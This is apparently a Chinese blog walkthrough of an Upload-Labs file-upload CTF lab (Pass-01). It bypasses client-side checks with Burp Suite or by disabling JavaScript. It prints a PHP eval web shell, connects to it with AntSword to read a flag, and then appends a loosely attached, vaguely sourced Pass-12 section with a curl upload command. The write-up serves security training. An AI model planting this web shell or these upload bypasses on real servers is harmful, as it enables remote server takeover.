Upload labs Linux Pass-01通关详解

补充

<?php phpinfo();?> 是一段简单的 PHP 代码,用于显示当前服务器的 PHP 配置信息

<?php ... ?>:PHP 的起始和结束标签,包裹其中的 PHP 代码。

phpinfo();:PHP 内置函数,调用后会生成一个完整的 HTML 页面,包含服务器的 PHP 环境信息。

方法1

1.上传php文件

点击上传后

提示该文件类型被限制 我们想要绕过前端文件类型验证 并且想让木马以php格式运行

所以我们将php文件修改为.jpg文件来绕过前端 之后通过bp抓包 (在服务端)修改文件后缀 从而实现木马执行

2.修改文件类型

修改为

选择路径 打开

3.打开burpsuite监听

点击上传 进行抓包

抓到的包显示为

修改为

点击Forward进行上传

我们看到上传成功

4.查看具体信息

在上传完成的图片右击选择“View Image”

会出现一个完整的php界面

方法2

1.在火狐浏览器中按F12 勾选“Disable JavaScript”来禁用js前端验证来绕过

2.上传abc.php文件

<?php @eval($_POST['pwd']);?>

上传成功

3.使用蚁剑查看详细信息

1)复制链接http://d3c646f6-352a-4b07-8b90-6cbc0788ec3a.node5.buuoj.cn:81/Pass-01/index.php

2)修改形式为

http://d3c646f6-352a-4b07-8b90-6cbc0788ec3a.node5.buuoj.cn:81/upload/abc.php

3)输入木马口令pwd 

测试连接 发现成功 可以添加数据 进行查看详细信息

4)查看详细信息

双击条目查看详细信息

在根目录下找到了flag

即flag{fd7e698b-cc14-4c1a-9adc-ebef0911d47f}

### 关于 Upload-Labs Pass-12 的解法 #### 背景介绍 Upload-Labs 是一个基于 PHP 编写的靶场项目,用于练习和学习文件上传漏洞的相关技巧。Pass-12 主要涉及通过特定条件下的文件上传来实现攻击目标。 #### 文件类型检测机制分析 在第十二关中,服务器端不仅会检查文件头信息还会验证 MIME 类型以及文件扩展名。为了成功绕过这些限制并完成挑战,可以利用某些浏览器或工具发送自定义 HTTP 请求头部[^1]。 #### 利用方法 一种常见的策略是构造特殊格式的数据包,在请求体内的 `Content-Type` 字段指定合法的图片MIME类型(如 image/jpeg),而实际提交的内容则为恶意脚本代码。由于服务端仅依赖客户端声明的信息来进行初步判断,因此这种方法可以在一定程度上规避基本的安全过滤[^2]。 另外需要注意的是,尽管该题目可能允许上传带有 .php 扩展名以外其他类型的文件,但在最终保存到磁盘之前通常会被重命名为随机字符串加上固定的后缀形式存储。所以即使能够上传 php 文件也需要考虑如何触发执行[^3]。 ```bash curl -X POST \ http://target_url/index.php?case=12&action=upload \ -H 'content-type: multipart/form-data;' \ -F "file=@/path/to/malicious_file.jpg;filename=image.jpg" ``` 此命令展示了如何使用 curl 工具向目标 URL 发送包含伪造 Content-Type 头部字段的POST请求,并附带一个名为image.jpg的实际载荷文件路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值